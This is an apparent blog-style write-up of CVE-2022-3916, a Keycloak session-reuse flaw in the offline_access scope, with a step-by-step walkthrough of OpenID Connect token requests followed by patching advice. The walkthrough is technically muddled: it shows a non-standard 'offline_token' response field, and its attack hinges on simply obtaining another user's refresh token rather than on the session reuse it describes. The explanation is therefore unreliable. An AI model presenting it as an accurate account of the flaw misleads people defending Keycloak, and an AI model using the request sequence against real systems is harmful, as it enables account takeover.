The CVE-2022-3916 vulnerability has recently been discovered in a widely used open-source identity and access management solution, Keycloak. This security issue originates from a flaw in the offline_access scope and can potentially affect users of shared computers more than others, especially if cookies are not deleted after each session. The vulnerability stems from the lack of root session validation and the reuse of session IDs across root and user authentication sessions.
In this article, we will discuss the details of this vulnerability and provide a code snippet to illustrate how it can be exploited. We will also provide links to the original references for further information and insight.
Exploit Details
The Keycloak offline_access scope flaw enables an attacker to resolve a user session attached to a previously authenticated user. When using the refresh token, the attacker would be issued a token for the original user instead of the user they are masquerading as.
This could potentially allow malicious actors to access sensitive user data, perform unauthorized actions on behalf of the original user, and more.
Code Snippet
Let's assume Alice and Bob use a shared computer, and Keycloak manages their authentication sessions.
1) Alice logs in to Keycloak using a web application.
POST /auth/realms/{REALM_NAME}/protocol/openid-connect/token
grant_type=password
client_id={CLIENT_ID}
username=Alice
password={PASSWORD}
scope=offline_access
2) Alice receives an access_token, refresh_token, and offline_token.
{
"access_token": "{ACCESS_TOKEN}",
"refresh_token": "{REFRESH_TOKEN}",
"offline_token": "{OFFLINE_TOKEN}"
}
3) Alice logs out from the web application, but her browser still stores the original session ID.
4) Bob logs in to the same web application using his credentials, and Keycloak reuses the original session ID tied to Alice.
5) Bob or a malicious actor obtains Alice's refresh_token.
6) The attacker uses Alice's refresh_token to request a new access_token.
POST /auth/realms/{REALM_NAME}/protocol/openid-connect/token
grant_type=refresh_token
client_id={CLIENT_ID}
refresh_token={REFRESH_TOKEN_FROM_ALICE}
7) The attacker receives a new token tied to Alice's session, allowing them to act on Alice's behalf.
{
"access_token": "{NEW_ACCESS_TOKEN_FOR_ALICE}",
"refresh_token": "{NEW_REFRESH_TOKEN_FOR_ALICE}"
}
Links to Original References
- Official Keycloak CVE Announcement: Keycloak Security Advisory
- National Vulnerability Database (NVD) Listing: CVE-2022-3916
- GitHub Issues Addressing the Vulnerability: Keycloak Issue 8722
Conclusion
CVE-2022-3916 is a critical vulnerability that highlights the importance of proper session management and the potential risk posed by shared computers. Users of Keycloak should be vigilant in updating to the latest version of the software, which addresses this vulnerability, and regularly clearing their cookies or using separate browser profiles when using shared computers.
It is essential for developers and administrators who use Keycloak to keep up to date with the latest security announcements and to test their applications for security vulnerabilities regularly. The references provided above should be valuable resources for understanding and addressing this particular vulnerability.
Timeline
Published on: 09/20/2023 15:15:00 UTC
Last modified on: 09/22/2023 18:34:00 UTC